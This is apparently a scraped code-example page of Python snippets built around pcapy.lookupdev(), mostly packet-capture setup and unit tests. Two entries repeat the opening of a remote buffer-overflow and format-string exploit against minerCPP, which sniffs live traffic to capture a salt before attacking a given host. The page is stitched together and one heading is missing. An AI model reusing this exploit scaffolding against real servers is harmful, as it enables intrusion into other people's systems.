Пример #1
0
    def init(self):
        try:
            self.device = pcapy.open_live(pcapy.lookupdev(), 65535, 0, 0)
            self.device.setfilter("tcp port 80")
        except Exception as e:
            print(e)
            return False

        return True
Пример #2
0
    def test_alldevs(self):
        "findalldevs() returns a list of strings including the default device"

        # the return value of this call is a list
        alldevs = pcapy.findalldevs()
        self.assertIsInstance(alldevs, list)

        # each member of the list is a string
        for devname in alldevs:
            self.assertIsInstance(devname, str)

        # the default device is one of all the devices
        defaultdev = pcapy.lookupdev()
        self.assertIn(defaultdev, alldevs)
Пример #3
0
#Code execution worked to me 10 out of 50 times.

from socket import *
from time import sleep
import pcapy, hashlib, re, struct, os, sys

print 'minerCPP 0.4b Remote BOF+Format String Attack by l3D ([email protected])\n'

if len(sys.argv) < 3:
	print 'Usage: python %s <host> <port> [salt]' % sys.argv[0]
	print 'If salt is not specified, the exploit sniffs it automatically.'

if len(sys.argv) > 3:
	salt=sys.argv[3]
else:
	dev=pcapy.lookupdev()
	cap=pcapy.open_live(dev, 1024, False, 0)
	cap.setfilter("dst 69.175.14.242 and dst port 80")
	data=cap.next()[1]
	while 1:
		salt=re.findall(r'salt=(\d+)', data)
		if salt:
			salt=salt[0]
			break
		data=cap.next()[1]

host=sys.argv[1]
port=int(sys.argv[2])

exp=re.compile(r'0X([0-9A-F]+)')
 def initialize(self):
     self.pcap = pcapy.open_live(pcapy.lookupdev(), -1, 1, 1)
     self.pcap.setfilter("port 67", 1, 0xffffff00)
     self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
     self.sock.connect(('192.168.1.1', 67))
     self.decoder = ImpactDecoder.EthDecoder()
Пример #5
0
#Code execution worked to me 10 out of 50 times.

from socket import *
from time import sleep
import pcapy, hashlib, re, struct, os, sys

print 'minerCPP 0.4b Remote BOF+Format String Attack by l3D ([email protected])\n'

if len(sys.argv) < 3:
	print 'Usage: python %s <host> <port> [salt]' % sys.argv[0]
	print 'If salt is not specified, the exploit sniffs it automatically.'

if len(sys.argv) > 3:
	salt=sys.argv[3]
else:
	dev=pcapy.lookupdev()
	cap=pcapy.open_live(dev, 1024, False, 0)
	cap.setfilter("dst 69.175.14.242 and dst port 80")
	data=cap.next()[1]
	while 1:
		salt=re.findall(r'salt=(\d+)', data)
		if salt:
			salt=salt[0]
			break
		data=cap.next()[1]

host=sys.argv[1]
port=int(sys.argv[2])

exp=re.compile(r'0X([0-9A-F]+)')
Пример #6
0
 def initialize(self):
     self.pcap = pcapy.open_live(pcapy.lookupdev(), -1, 1, 1)
     self.pcap.setfilter("port 67", 1, 0xFFFFFF00)
     self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
     self.sock.connect(("192.168.1.1", 67))
     self.decoder = ImpactDecoder.EthDecoder()
Пример #7
0
    def test_have_default_device(self):
        "lookupdev() returns a non-empty string"

        defaultdev = pcapy.lookupdev()
        self.assertIsInstance(defaultdev, str)
        self.assertNotEqual(defaultdev, "")
Пример #8
0
def initial_pcapy(device=None):
    if not device:
        device=pcapy.lookupdev()
    pc=pcapy.open_live(device,4096,1,0)
    return pc